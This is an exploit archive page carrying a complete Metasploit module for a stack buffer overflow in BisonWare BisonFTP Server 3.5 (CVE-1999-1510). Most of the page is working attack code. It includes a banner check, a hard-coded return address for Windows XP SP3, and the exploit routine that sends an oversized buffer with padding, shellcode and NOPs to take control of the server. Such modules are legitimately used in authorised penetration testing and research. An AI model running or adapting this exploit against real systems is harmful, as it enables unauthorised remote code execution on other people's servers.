BisonWare BisonFTP Server 3.5 Buffer Overflow

BisonWare BisonFTP Server 3.5 Buffer Overflow: Posted Nov 25, 2015; Authored by localh0t, Jay Turla, veerendragg | Site metasploit.com; BisonWare BisonFTP Server version 3.5 is prone to an overflow condition. This Metasploit module exploits a buffer overflow vulnerability in said application.; tags | exploit, overflow; advisories | CVE-1999-1510; SHA-256 | ad92db3f8a0dd8f3d603187873cbcc879f069b52034b56d5481e2bd22b4892dd; Download | Favorite | View

BisonWare BisonFTP Server 3.5 Buffer Overflow

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit4 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Ftp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'BisonWare BisonFTP Server Buffer Overflow',
      'Description'    => %q{
        BisonWare BisonFTP Server 3.5 is prone to an overflow condition.
        This module exploits a buffer overflow vulnerability in the said
        application.
      },
      'Platform'       => 'win',
      'Author'         =>
        [
          'localh0t', # initial discovery
          'veerendragg @ SecPod', # initial msf
          'Jay Turla' # msf
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '1999-1510'],
          [ 'BID', '49109'],
          [ 'EDB', '17649'],
          [ 'URL', 'http://secpod.org/msf/bison_server_bof.rb']
        ],
      'Privileged'     => false,
      'DefaultOptions' =>
        {
          'VERBOSE'  => true
        },
      'Payload'        =>
        {
          'Space'           => 310,
          'BadChars'        => "\x00\x0a\x0d",
          'StackAdjustment' => -3500,
        },
      'Targets'        =>
        [
          [ 'Bisonware FTP Server / Windows XP SP3 EN',
            {
              'Ret'    => 0x0040333f,
              'Offset' => 1028,
              'Nops'   =>  404
            }
          ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Aug 07 2011'))
  end

  def check
    connect_login
    disconnect
    if /BisonWare BisonFTP server product V3\.5/i === banner
      return Exploit::CheckCode::Appears
    else
      return Exploit::CheckCode::Safe
    end
  end

  def exploit
    connect
    print_status('Triggering the prompt for an unregistered product')
    sock.put('')
    print_status('Disconnecting...')
    disconnect

    print_status('Connecting for the second time to deliver our payload...')
    connect #connect for the second time

    buf = rand_text_alpha(target['Offset'])
    buf << payload.encoded
    buf << make_nops( (target['Nops']) - payload.encoded.length)
    buf << [target.ret].pack('V')
    print_status('Sending payload...')

    sock.put(buf)
    handler
    disconnect
  end
end

Top Authors In Last 30 Days

Red Hat 179 files
Ubuntu 58 files
Debian 26 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
E1.Coders 4 files
malvuln 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

BisonWare BisonFTP Server 3.5 Buffer Overflow

BisonWare BisonFTP Server 3.5 Buffer Overflow

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

BisonWare BisonFTP Server 3.5 Buffer Overflow

Share This

BisonWare BisonFTP Server 3.5 Buffer Overflow

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems